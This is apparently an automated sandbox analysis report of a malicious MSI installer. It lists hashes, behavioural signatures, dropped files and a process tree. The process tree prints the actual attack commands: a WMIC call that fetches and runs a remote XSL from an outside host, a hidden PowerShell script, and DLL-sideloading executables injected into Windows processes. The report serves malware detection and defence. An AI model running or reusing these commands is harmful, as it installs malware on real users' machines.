Analysis

  • max time kernel
    113s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-10-2022 14:06

General

  • Target

    test/91B5DB3C0CCBD68BD04C24571E27F99D.msi

  • Size

    277KB

  • MD5

    91b5db3c0ccbd68bd04c24571e27f99d

  • SHA1

    b01cb4fe38315d41fcbe9c6278ebe4574496ab0d

  • SHA256

    ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130

  • SHA512

    9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

  • SSDEEP

    3072:GErW9/kks5wgz88ereWn/7w05g049at7I3DGY5AvMcB3RUN46ILJ9+ZB5yOanoC:GEqckh8er1nzTD+3DGY5Aor9

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request ⋅ 4 IoCs
  • Executes dropped EXE ⋅ 3 IoCs
  • Checks computer location settings ⋅ 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file ⋅ 1 IoCs
  • Loads dropped DLL ⋅ 11 IoCs
  • Enumerates connected drives ⋅ 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service ⋅ 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory ⋅ 11 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses ⋅ 11 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
  • Suspicious use of FindShellTrayWindow ⋅ 2 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 23 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    Enumerates connected drives
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    PID:2160
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    Enumerates connected drives
    Drops file in Windows directory
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding F64BBE2798DDDDFE6B7FE7D29A4FCC53
      Blocklisted process makes network request
      Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        Blocklisted process makes network request
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:1056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          Blocklisted process makes network request
          Drops startup file
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:2980
          • C:\Users\Admin\AppData\Roaming\KmIg\nvsmartmaxapp.exe
            "C:\Users\Admin\AppData\Roaming\KmIg\nvsmartmaxapp.exe"
            Executes dropped EXE
            Loads dropped DLL
            Suspicious use of WriteProcessMemory
            PID:2284
            • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
              "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Loads dropped DLL
              Suspicious behavior: EnumeratesProcesses
              PID:1072
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 8B4481134E3DE7737832B6F066560B87
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:3780
      • C:\Users\Admin\AppData\Local\Temp\lc1A5E.tmp
        "C:\Users\Admin\AppData\Local\Temp\lc1A5E.tmp"
        Executes dropped EXE
        PID:952
  • C:\Users\Admin\AppData\Roaming\KmIg\gup.exe
    C:\Users\Admin\AppData\Roaming\KmIg\gup.exe
    Executes dropped EXE
    Loads dropped DLL
    Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
      Loads dropped DLL
      PID:2136

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

          Execution

            Exfiltration

              Impact

                Initial Access

                  Lateral Movement

                    Persistence

                      Privilege Escalation

                        Replay Monitor

                        00:00 00:00

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\Admin.ps1
                          MD5

                          9a362dd5fb8679b63ca3996098a903ff

                          SHA1

                          f86f4bdc36538c666ed60c7ad2091b9e07b6c7e3

                          SHA256

                          30cc11279f166a46236eb838391df9d0d93fda8e818755a6fbe6168d13c7e8fc

                          SHA512

                          d805eb926fd611cf81834d2f6fb27f025954365b636bc536c83247611106110dc404cbf96ce79ec96d76db443bcc24681903b786813e6ae407c1df7a59b71452

                        • C:\Users\Admin\AppData\Local\Temp\lc1A5E.tmp
                          MD5

                          55ffee241709ae96cf64cb0b9a96f0d7

                          SHA1

                          b191810094dd2ee6b13c0d33458fafcd459681ae

                          SHA256

                          64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

                          SHA512

                          01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

                        • C:\Users\Admin\AppData\Local\Temp\lc1A5E.tmp
                          MD5

                          55ffee241709ae96cf64cb0b9a96f0d7

                          SHA1

                          b191810094dd2ee6b13c0d33458fafcd459681ae

                          SHA256

                          64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

                          SHA512

                          01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

                        • C:\Users\Admin\AppData\Roaming\KmIg\NvSmartMax
                          MD5

                          78ef53b2ad57536c74bbafece93a95e6

                          SHA1

                          4b23eb993a5853013911a0310c1cbb834500ba94

                          SHA256

                          371a793bdbe086871f1526000f878499b5fdd0426ffb6934745866483bbb6751

                          SHA512

                          182079daa43cf65d29d277274cdb78b3383a61a518237c65bf4dcc29ba71e147c425f097d4473fecd455f4f9ab44c316bf1e292d045529b167bb852cb1babe71

                        • C:\Users\Admin\AppData\Roaming\KmIg\NvSmartMax.dll
                          MD5

                          5b861438e716d7c47632c4922be36795

                          SHA1

                          499a5534020bd3ffa82097bf1edae7668367b6bc

                          SHA256

                          eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

                          SHA512

                          9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

                        • C:\Users\Admin\AppData\Roaming\KmIg\NvSmartMax.dll
                          MD5

                          5b861438e716d7c47632c4922be36795

                          SHA1

                          499a5534020bd3ffa82097bf1edae7668367b6bc

                          SHA256

                          eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

                          SHA512

                          9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

                        • C:\Users\Admin\AppData\Roaming\KmIg\NvSmartMax.dll
                          MD5

                          5b861438e716d7c47632c4922be36795

                          SHA1

                          499a5534020bd3ffa82097bf1edae7668367b6bc

                          SHA256

                          eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

                          SHA512

                          9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

                        • C:\Users\Admin\AppData\Roaming\KmIg\NvSmartMax.dll
                          MD5

                          5b861438e716d7c47632c4922be36795

                          SHA1

                          499a5534020bd3ffa82097bf1edae7668367b6bc

                          SHA256

                          eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

                          SHA512

                          9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

                        • C:\Users\Admin\AppData\Roaming\KmIg\gup.exe
                          MD5

                          45c01734ed56c52797156620a5f8b414

                          SHA1

                          fc37ac7523cf3b4020ec46d6a47bc26957e3c054

                          SHA256

                          20ae23a6793e58761a28949dec7e910ce6479ab9c2b7bcbd7a1bb4df1171c503

                          SHA512

                          4bd34101fff667a19d4884ef7f1b952dc236918138e1571aba8d5a0d691f914260a0233d6906168ed5c70f19e15f7328b1f82eb6247a1fe71395f6d4798ccf75

                        • C:\Users\Admin\AppData\Roaming\KmIg\gup.exe
                          MD5

                          45c01734ed56c52797156620a5f8b414

                          SHA1

                          fc37ac7523cf3b4020ec46d6a47bc26957e3c054

                          SHA256

                          20ae23a6793e58761a28949dec7e910ce6479ab9c2b7bcbd7a1bb4df1171c503

                          SHA512

                          4bd34101fff667a19d4884ef7f1b952dc236918138e1571aba8d5a0d691f914260a0233d6906168ed5c70f19e15f7328b1f82eb6247a1fe71395f6d4798ccf75

                        • C:\Users\Admin\AppData\Roaming\KmIg\gup.xml
                          MD5

                          b023cc4d768b34a5401f317479740a53

                          SHA1

                          4ca45db707b120bca9cb6cd8404b9e6ecabdb2d2

                          SHA256

                          d3e6404c7286961cbab82d4c49f82bcb166db9b5a13eacaa0eeb59a0709a0c14

                          SHA512

                          82829b0d22cdb857cf1d299a9898d1862b61cd3c22eb05cb638391d3a54b12d5dd7a824ef838a9453e2c2b85c516eacad18b6d19221ad24f0bcedc2fff942e25

                        • C:\Users\Admin\AppData\Roaming\KmIg\libcurl
                          MD5

                          b4ad244ff08ca0a4413bead51fd9bb2c

                          SHA1

                          61f2e2d9237406eecbd446e782549019404ef5cd

                          SHA256

                          b150bc468e1df07540255450df863f5e309f7142f12edd5ed2d847ef8b05ab04

                          SHA512

                          f56532d9c780ce61f41f0f3030760d4add99dd2bd34bf22acab15b0c497c68cefd8734576b84ce23f8f93eb80a6162ca683c0ef237512040d2515112cd75b800

                        • C:\Users\Admin\AppData\Roaming\KmIg\libcurl.dll
                          MD5

                          e880c09454a68b4714c6f184f7968070

                          SHA1

                          4dba5fe842b01b641a7228a4c8f805e4627c0012

                          SHA256

                          c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

                          SHA512

                          712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

                        • C:\Users\Admin\AppData\Roaming\KmIg\libcurl.dll
                          MD5

                          e880c09454a68b4714c6f184f7968070

                          SHA1

                          4dba5fe842b01b641a7228a4c8f805e4627c0012

                          SHA256

                          c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

                          SHA512

                          712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

                        • C:\Users\Admin\AppData\Roaming\KmIg\libcurl.dll
                          MD5

                          e880c09454a68b4714c6f184f7968070

                          SHA1

                          4dba5fe842b01b641a7228a4c8f805e4627c0012

                          SHA256

                          c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

                          SHA512

                          712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

                        • C:\Users\Admin\AppData\Roaming\KmIg\libcurl.dll
                          MD5

                          e880c09454a68b4714c6f184f7968070

                          SHA1

                          4dba5fe842b01b641a7228a4c8f805e4627c0012

                          SHA256

                          c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

                          SHA512

                          712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

                        • C:\Users\Admin\AppData\Roaming\KmIg\libcurl.dll
                          MD5

                          e880c09454a68b4714c6f184f7968070

                          SHA1

                          4dba5fe842b01b641a7228a4c8f805e4627c0012

                          SHA256

                          c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

                          SHA512

                          712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

                        • C:\Users\Admin\AppData\Roaming\KmIg\nvsmartmaxapp.exe
                          MD5

                          df3e0e32d1e1fb50cc292aebc5e5b322

                          SHA1

                          12c93bb262696314123562f8a4b158074c9f6b95

                          SHA256

                          6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

                          SHA512

                          71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

                        • C:\Users\Admin\AppData\Roaming\KmIg\nvsmartmaxapp.exe
                          MD5

                          df3e0e32d1e1fb50cc292aebc5e5b322

                          SHA1

                          12c93bb262696314123562f8a4b158074c9f6b95

                          SHA256

                          6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

                          SHA512

                          71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

                        • C:\Windows\Installer\MSI1A02.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • C:\Windows\Installer\MSI1A02.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • C:\Windows\Installer\MSI2108.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • C:\Windows\Installer\MSI2108.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • C:\Windows\Installer\MSIDA48.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • C:\Windows\Installer\MSIDA48.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • C:\Windows\Installer\MSIFE99.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • C:\Windows\Installer\MSIFE99.tmp
                          MD5

                          9f1e5d66c2889018daef4aef604eebc4

                          SHA1

                          b80294261c8a1635e16e14f55a3d76889ff2c857

                          SHA256

                          02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

                          SHA512

                          8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

                        • memory/952-146-0x0000000000000000-mapping.dmp
                        • memory/1056-133-0x0000000000000000-mapping.dmp
                        • memory/1072-160-0x0000000002740000-0x0000000002ABD000-memory.dmp
                        • memory/1072-157-0x0000000000000000-mapping.dmp
                        • memory/1304-167-0x0000000000A30000-0x0000000000B53000-memory.dmp
                        • memory/2284-151-0x0000000000000000-mapping.dmp
                        • memory/2496-132-0x0000000000000000-mapping.dmp
                        • memory/2980-143-0x00007FFDDFE50000-0x00007FFDE0911000-memory.dmp
                        • memory/2980-138-0x00007FFDDFE50000-0x00007FFDE0911000-memory.dmp
                        • memory/2980-136-0x000001A34F470000-0x000001A34F492000-memory.dmp
                        • memory/2980-135-0x0000000000000000-mapping.dmp
                        • memory/2980-155-0x00007FFDDFE50000-0x00007FFDE0911000-memory.dmp
                        • memory/3780-134-0x0000000000000000-mapping.dmp